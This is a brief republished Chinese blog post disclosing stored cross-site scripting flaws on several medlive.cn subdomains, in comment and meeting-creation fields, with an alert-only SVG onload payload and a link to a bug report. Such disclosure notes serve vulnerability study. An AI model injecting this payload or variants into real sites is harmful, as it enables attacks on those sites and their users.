【漏洞学习——XSS】医脉通评论+新建会议处XSS - 走看看

zoukankan html css js c++ java

【漏洞学习——XSS】医脉通评论+新建会议处XSS

存储型XSS

医脉通多站点存在XSS漏洞

1、http://ecases.medlive.cn/
在发布评论处插入"/><svg οnlοad=alert(/1/)>

2、http://co-diovan.medlive.cn/

3.http://pua.medlive.cn/

4.http://meetings.medlive.cn/ 这个是在发布会议处存在。

参见：https://bugs.shuimugan.com/bug/view?bug_no=154305

总会有不期而遇的温暖. 和生生不息的希望。

查看全文

相关阅读:
分分钟制作微信朋友圈页面
 js模板引擎原理，附自己写的简洁模板引擎
 基于H5 pushState实现无跳转页面刷新
 随手学和记——PHP快速上手基础
 ES5 特性概览
 JavaScript错误和异常
 JavaScript闭包探究
 FastDFS总结
 C++11笔记
 leveldb源码笔记

原文地址：https://www.cnblogs.com/devi1/p/13486214.html

Copyright © 2011-2022 走看看